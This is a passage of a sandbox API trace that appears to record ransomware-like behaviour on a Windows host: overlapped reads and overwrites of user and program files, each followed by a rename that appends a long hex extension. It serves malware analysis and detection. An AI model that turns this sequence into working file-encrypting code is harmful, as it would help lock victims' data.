CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0156.372] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x7512368, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7512368, ReturnLength=0x708f9e4) returned 0x0 [0156.374] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2=".37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36" [0156.374] GetProcessHeap () returned 0x270000 [0156.374] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b4) returned 0x42fc668 [0156.374] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x708f9d4, FileInformation=0x42fc668, Length=0x1b4, FileInformationClass=0xa) returned 0x0 [0156.376] CloseHandle (hObject=0x5a4) returned 1 [0156.381] GetProcessHeap () returned 0x270000 [0156.383] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75122b8 | out: hHeap=0x270000) returned 1 [0156.385] RtlInterlockedCompareExchange64 () returned 0x3 [0156.385] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0156.512] ReadFile (in: hFile=0x5a4, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0156.512] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, 
lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0156.513] WriteFile (in: hFile=0x5a4, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x5e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0156.514] RtlInterlockedCompareExchange64 () returned 0x0 [0156.514] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0156.515] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x744a270, ReturnLength=0x708f9e4) returned 0x0 [0156.517] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2=".CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A" [0156.517] GetProcessHeap () returned 0x270000 [0156.517] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a8) returned 0x4278880 [0156.517] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x708f9d4, FileInformation=0x4278880, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0156.518] CloseHandle (hObject=0x5a4) returned 1 [0156.521] GetProcessHeap () returned 0x270000 [0156.523] HeapFree (in: 
hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0156.524] RtlInterlockedCompareExchange64 () returned 0x2 [0156.524] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0158.516] WriteFile (in: hFile=0x5a4, lpBuffer=0x7410188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050) returned 1 [0158.519] RtlInterlockedCompareExchange64 () returned 0x1 [0158.519] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0158.529] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x73f0100, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73f0100, ReturnLength=0x708f9e4) returned 0x0 [0158.530] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab", lpString2=".D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65" [0158.530] GetProcessHeap () returned 0x270000 
[0158.531] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a8) returned 0x4278da8 [0158.531] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x708f9d4, FileInformation=0x4278da8, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0158.647] CloseHandle (hObject=0x5a4) returned 1 [0158.671] GetProcessHeap () returned 0x270000 [0158.672] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0158.679] RtlInterlockedCompareExchange64 () returned 0x2 [0158.679] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.213] ReadFile (in: hFile=0x58c, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0159.219] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.221] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0159.223] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db", lpString2=".BC5A1C0E9CEA032389357EC4834B814776F2FE099E265E9B6DDE5917131B4801" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db.BC5A1C0E9CEA032389357EC4834B814776F2FE099E265E9B6DDE5917131B4801") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db.BC5A1C0E9CEA032389357EC4834B814776F2FE099E265E9B6DDE5917131B4801" [0159.223] GetProcessHeap () returned 0x270000 [0159.223] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x4275be8 [0159.223] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x708f9d4, FileInformation=0x4275be8, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0159.349] CloseHandle (hObject=0x58c) returned 1 [0159.477] GetProcessHeap () returned 0x270000 [0159.478] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0159.479] RtlInterlockedCompareExchange64 () returned 0x1 [0159.479] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.495] ReadFile (in: hFile=0x590, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.496] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.497] WriteFile (in: hFile=0x590, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.498] RtlInterlockedCompareExchange64 () returned 0x0 [0159.498] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.499] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x708f9e4) returned 0x0 [0159.500] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml", lpString2=".65AEDCBE39C78E0832BF720FD75215E27D2397B7AA745350086219B337B15B02" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml.65AEDCBE39C78E0832BF720FD75215E27D2397B7AA745350086219B337B15B02") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml.65AEDCBE39C78E0832BF720FD75215E27D2397B7AA745350086219B337B15B02" [0159.500] GetProcessHeap () returned 0x270000 [0159.500] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x154) returned 0x35aed0 [0159.500] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x708f9d4, FileInformation=0x35aed0, Length=0x154, FileInformationClass=0xa) returned 0x0 [0159.502] CloseHandle (hObject=0x590) returned 1 [0159.506] GetProcessHeap () returned 0x270000 [0159.508] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0159.508] RtlInterlockedCompareExchange64 () returned 0x1 [0159.508] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.510] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0159.511] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.511] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.512] RtlInterlockedCompareExchange64 () returned 0x0 [0159.512] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.642] WriteFile (in: hFile=0x58c, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0159.643] RtlInterlockedCompareExchange64 () returned 0x0 [0159.643] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.666] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.667] RtlInterlockedCompareExchange64 () returned 0x0 [0159.668] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) 
returned 1 [0159.691] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0159.693] RtlInterlockedCompareExchange64 () returned 0x0 [0159.693] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.863] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7422118, ReturnLength=0x708f9e4) returned 0x0 [0159.864] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll", lpString2=".A508F8E2E88E797081E3DE6302FE3DC473A54B47265881779087D3E09BD37F4D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll.A508F8E2E88E797081E3DE6302FE3DC473A54B47265881779087D3E09BD37F4D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll.A508F8E2E88E797081E3DE6302FE3DC473A54B47265881779087D3E09BD37F4D" [0159.864] GetProcessHeap () returned 0x270000 [0159.864] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x178) returned 0x427a868 [0159.864] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x708f9d4, FileInformation=0x427a868, Length=0x178, FileInformationClass=0xa) returned 0x0 [0159.875] CloseHandle (hObject=0x5ac) returned 1 [0159.919] GetProcessHeap () returned 0x270000 [0159.920] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.921] 
RtlInterlockedCompareExchange64 () returned 0x2 [0159.921] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.946] WriteFile (in: hFile=0x590, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0159.947] RtlInterlockedCompareExchange64 () returned 0x0 [0159.947] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.948] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0159.949] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll", lpString2=".4D581DE6BDAAAAA64245D4ABDE795E302F579F868BE0D95795A4082C74743173" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll.4D581DE6BDAAAAA64245D4ABDE795E302F579F868BE0D95795A4082C74743173") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll.4D581DE6BDAAAAA64245D4ABDE795E302F579F868BE0D95795A4082C74743173" [0159.949] GetProcessHeap () returned 0x270000 [0159.949] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16a) returned 0x4286b98 [0159.949] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x708f9d4, 
FileInformation=0x4286b98, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0159.951] CloseHandle (hObject=0x590) returned 1 [0159.996] GetProcessHeap () returned 0x270000 [0159.998] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0159.998] RtlInterlockedCompareExchange64 () returned 0x1 [0159.998] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.002] ReadFile (in: hFile=0x590, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0160.002] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.019] WriteFile (in: hFile=0x590, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0160.022] RtlInterlockedCompareExchange64 () returned 0x0 [0160.022] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.027] ReadFile (in: hFile=0x5a8, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0160.027] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 
lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.032] ReadFile (in: hFile=0x5ac, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0160.033] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.039] ReadFile (in: hFile=0x5b4, lpBuffer=0x7492450, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0160.039] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.043] WriteFile (in: hFile=0x5a8, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0160.045] RtlInterlockedCompareExchange64 () returned 0x1 [0160.045] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.048] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: 
ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0160.049] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll", lpString2=".35525DAF1F3FABCBB4C8021CD59CD3DC56BAFFBAC7BAB9EC76D930101D08870B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll.35525DAF1F3FABCBB4C8021CD59CD3DC56BAFFBAC7BAB9EC76D930101D08870B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll.35525DAF1F3FABCBB4C8021CD59CD3DC56BAFFBAC7BAB9EC76D930101D08870B" [0160.049] GetProcessHeap () returned 0x270000 [0160.049] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16a) returned 0x42f0c78 [0160.049] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x708f9d4, FileInformation=0x42f0c78, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0160.207] CloseHandle (hObject=0x590) returned 1 [0160.237] GetProcessHeap () returned 0x270000 [0160.238] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0160.246] RtlInterlockedCompareExchange64 () returned 0x2 [0160.246] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.332] WriteFile (in: hFile=0x5a8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0160.334] RtlInterlockedCompareExchange64 () returned 0x0 [0160.334] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.501] WriteFile (in: hFile=0x5b4, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0160.503] RtlInterlockedCompareExchange64 () returned 0x1 [0160.503] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0160.505] WriteFile (in: hFile=0x590, lpBuffer=0x74421a0*, 